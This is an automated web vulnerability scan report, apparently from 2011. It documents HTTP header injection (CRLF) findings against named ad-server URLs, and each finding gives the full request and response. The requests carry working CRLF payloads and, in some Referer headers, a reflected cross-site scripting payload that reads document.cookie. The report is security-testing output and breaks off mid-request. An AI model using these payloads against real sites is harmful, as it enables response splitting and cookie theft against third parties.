2.1075. http://www.womenshealthmag.com/quizzes [name of an arbitrarily supplied request parameter]

2.1076. http://www.womenshealthmag.com/rss-feeds [name of an arbitrarily supplied request parameter]

2.1077. http://www.womenshealthmag.com/search [name of an arbitrarily supplied request parameter]

2.1078. http://www.womenshealthmag.com/sex-and-relationships [name of an arbitrarily supplied request parameter]

2.1079. http://www.womenshealthmag.com/sound-off [name of an arbitrarily supplied request parameter]

2.1080. http://www.womenshealthmag.com/videos [name of an arbitrarily supplied request parameter]

2.1081. http://www.womenshealthmag.com/weight-loss [name of an arbitrarily supplied request parameter]

2.1082. http://www.womenshealthmag.com/weight-loss/ [name of an arbitrarily supplied request parameter]

2.1083. http://www.womenshealthmag.com/win-today [name of an arbitrarily supplied request parameter]

2.1084. http://www.womenshealthmag.com/workouts [name of an arbitrarily supplied request parameter]

2.1085. http://www.womenshealthmag.com/yoga [name of an arbitrarily supplied request parameter]

2.1086. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [Referer HTTP header]



1. HTTP header injection
There are 42 instances of this issue:


1.1. http://ad.doubleclick.net/2521745/newspeckle2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /2521745/newspeckle2.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cdb71%0d%0a199c0f4f72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2521745cdb71%0d%0a199c0f4f72/newspeckle2.html HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521745cdb71
199c0f4f72
/newspeckle2.html:
Date: Thu, 10 Mar 2011 22:19:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/2521745/newspeckle2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /2521745/newspeckle2.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b5b93%0d%0aad6e02800c7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /2521745/newspeckle2.htmlb5b93%0d%0aad6e02800c7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521745/newspeckle2.htmlb5b93
ad6e02800c7
:
Date: Thu, 10 Mar 2011 22:19:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/2521746/bluecoverforma2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /2521746/bluecoverforma2.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ccaaa%0d%0a9a571279f20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2521746ccaaa%0d%0a9a571279f20/bluecoverforma2.html HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521746ccaaa
9a571279f20
/bluecoverforma2.html:
Date: Thu, 10 Mar 2011 16:40:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/2521746/bluecoverforma2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /2521746/bluecoverforma2.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 61c52%0d%0aec7d1b61be3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /2521746/bluecoverforma2.html61c52%0d%0aec7d1b61be3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521746/bluecoverforma2.html61c52
ec7d1b61be3
:
Date: Thu, 10 Mar 2011 16:41:06 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/ad/N2434.127885.1691942218421/B5055470.38 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N2434.127885.1691942218421/B5055470.38

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 76e46%0d%0a6bf3b474ea1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /76e46%0d%0a6bf3b474ea1/N2434.127885.1691942218421/B5055470.38;sz=1x1;pc=[TPAS_ID];ord=8325851? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/76e46
6bf3b474ea1
/N2434.127885.1691942218421/B5055470.38;sz=1x1;pc=[TPAS_ID];ord=8325851:
Date: Thu, 10 Mar 2011 16:43:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/ad/N2724.rodale.com/B4504763.19 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N2724.rodale.com/B4504763.19

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b2fd%0d%0ad346ead6547 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b2fd%0d%0ad346ead6547/N2724.rodale.com/B4504763.19;sz=1x1;pc=[TPAS_ID];ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b2fd
d346ead6547
/N2724.rodale.com/B4504763.19;sz=1x1;pc=[TPAS_ID];ord=8296241:
Date: Thu, 10 Mar 2011 16:46:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22a11%0d%0adadb4ba6c5f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22a11%0d%0adadb4ba6c5f/N3340.Rodale/B4469440.10;sz=1x1;ord=8297648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22a11
dadb4ba6c5f
/N3340.Rodale/B4469440.10;sz=1x1;ord=8297648:
Date: Thu, 10 Mar 2011 16:42:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2180f%0d%0aa85c900d6a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2180f%0d%0aa85c900d6a3/N3340.Rodale/B4469440.2;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2180f
a85c900d6a3
/N3340.Rodale/B4469440.2;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:42:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.9. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2a8c1%0d%0ab4ae771faf2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2a8c1%0d%0ab4ae771faf2/N3340.Rodale/B4469440.3;sz=1x1;ord=8310538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2a8c1
b4ae771faf2
/N3340.Rodale/B4469440.3;sz=1x1;ord=8310538:
Date: Thu, 10 Mar 2011 16:43:13 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.10. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57985%0d%0aea3a8bb8e04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57985%0d%0aea3a8bb8e04/N3340.Rodale/B4469440.4;sz=1x1;ord=8307632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57985
ea3a8bb8e04
/N3340.Rodale/B4469440.4;sz=1x1;ord=8307632:
Date: Thu, 10 Mar 2011 16:46:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.11. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13e7e%0d%0a1300da2a990 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13e7e%0d%0a1300da2a990/N3340.Rodale/B4469440.5;sz=1x1;ord=8297648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13e7e
1300da2a990
/N3340.Rodale/B4469440.5;sz=1x1;ord=8297648:
Date: Thu, 10 Mar 2011 16:42:37 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.12. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1fcc3%0d%0a7b1aca2004 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1fcc3%0d%0a7b1aca2004/N3340.Rodale/B4469440.7;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1fcc3
7b1aca2004
/N3340.Rodale/B4469440.7;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:45:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.13. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.8 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 77afd%0d%0acbd18977bd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /77afd%0d%0acbd18977bd0/N3340.Rodale/B4469440.8;sz=1x1;ord=8310538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/77afd
cbd18977bd0
/N3340.Rodale/B4469440.8;sz=1x1;ord=8310538:
Date: Thu, 10 Mar 2011 16:43:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.14. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.9 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9588d%0d%0a8b3a22ba789 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9588d%0d%0a8b3a22ba789/N3340.Rodale/B4469440.9;sz=1x1;ord=8307632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9588d
8b3a22ba789
/N3340.Rodale/B4469440.9;sz=1x1;ord=8307632:
Date: Thu, 10 Mar 2011 16:43:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.15. http://ad.doubleclick.net/ad/N5767.womenshealthmagOX4554/B4627079.35 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5767.womenshealthmagOX4554/B4627079.35

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 61558%0d%0ac1a8d314f34 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /61558%0d%0ac1a8d314f34/N5767.womenshealthmagOX4554/B4627079.35;sz=1x1;ord=8322007? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/61558
c1a8d314f34
/N5767.womenshealthmagOX4554/B4627079.35;sz=1x1;ord=8322007:
Date: Thu, 10 Mar 2011 16:43:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.16. http://ad.doubleclick.net/ad/N6138.127885.WOMENSHEALTH/B5295230.17 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6138.127885.WOMENSHEALTH/B5295230.17

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a76d%0d%0abcbbc2dd448 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a76d%0d%0abcbbc2dd448/N6138.127885.WOMENSHEALTH/B5295230.17;sz=1x1;pc=[TPAS_ID];ord=6984913814812899? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a76d
bcbbc2dd448
/N6138.127885.WOMENSHEALTH/B5295230.17;sz=1x1;pc=[TPAS_ID];ord=6984913814812899:
Date: Thu, 10 Mar 2011 16:45:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.17. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.20 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6138.6483.MENSHEALTH/B5295230.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78aad%0d%0a049b38749bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78aad%0d%0a049b38749bb/N6138.6483.MENSHEALTH/B5295230.20;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78aad
049b38749bb
/N6138.6483.MENSHEALTH/B5295230.20;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:32 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.18. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.24 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6138.6483.MENSHEALTH/B5295230.24

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 77f38%0d%0a49cfd0de220 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /77f38%0d%0a49cfd0de220/N6138.6483.MENSHEALTH/B5295230.24;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
